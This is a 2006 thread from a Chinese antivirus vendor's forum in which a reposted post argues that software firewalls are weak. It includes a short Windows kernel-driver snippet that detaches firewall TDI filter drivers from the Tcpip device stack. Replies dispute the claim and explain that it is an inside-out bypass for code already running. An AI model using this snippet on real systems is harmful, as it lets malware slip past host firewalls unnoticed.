微点交流论坛

标题: ｛转贴｝所有的防火墙都很弱 [打印本页]

作者: 随风摇曳 时间: 2006-9-21 15:36 标题: ｛转贴｝所有的防火墙都很弱

唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的，其实我们只要写个驱动，从设备栈里把防火墙的TDI过滤驱动给摘除掉，这样就能对付一般的防火墙了。当然，国外强一点的防火墙，比如ZoneAlarm Pro 6.5就得再结合其他方法了，嘿嘿。

摘除过滤驱动的代码片段：

QUOTE:

RtlInitUnicodeString ( &TcpipName, L"\\Driver\\Tcpip" );

ObReferenceObjectByName( &TcpipName,
            OBJ_CASE_INSENSITIVE,
            NULL,
            0,
            *IoDriverObjectType,
            KernelMode,
            NULL,
            &TcpipDrvObj);

CurrentDevice = TcpipDrvObj->DeviceObject;

while(CurrentDevice != NULL )
{
CurrentDevice->AttachedDevice=0;
CurrentDevice = CurrentDevice->NextDevice;
}

这段代码就能足以使国内人人皆知的天网防火墙装了和没装一样... 呵呵

PS:这里的突破指的是软件防火墙的内对外层面。

[ Last edited by 随风摇曳 on 2006-9-22 at 12:28 ]

作者: 天涯 时间: 2006-9-21 23:19

Quote:

Originally posted by 随风摇曳 at 2006-9-21 15:36:
唉，软件防火墙好像没一个令我满意的，都比较弱，考虑不全。国内的防火墙更是令人心寒~ 无论是DLL注入还是不引入DLL的纯代码注入，还是TDI Cilent，都能把国内的防火墙搞定。NDIS hook 更不要说了..

来点好玩的 ...

所有的墙都很弱这句话不成立.我用的是瑞星墙你能突破我再说所有的墙都很弱这句话也不迟

作者: sxh_sxh 时间: 2006-9-22 11:33

Quote:

请注明转贴。
见h绅博GDATA AntiVirenKit（中国）论坛-> ..:::防火墙区:::.. -> [原创]所有的防火墙都很弱ttp://bbs.hypost.cn/read.php?tid=63953&fpage=1&toread=&page=1

作者: flo 时间: 2006-9-22 17:55
我已经N次看见此帖了。先是在xyzreg的blog里，然后又在各大论坛里看到...
其实这个想法还是正确的，只是有可能吓到一点人了...TDI驱动是大多数防火墙都用到的技术。区别是有的防火墙一棵树上吊死，有的还配合了许多其他的技术，在其他层面上也有拦截。
2楼的朋友：这里说的是从内到外突破。就是假定危险程序已经运行，然后bypass防火墙，比如不经授权访问网络等。瑞星的话，好像DLL注入就能过了吧。

[ Last edited by flo on 2006-9-22 at 22:25 ]

欢迎光临微点交流论坛 (http://bbs.micropoint.com.cn/)

bbs.micropoint.com.cn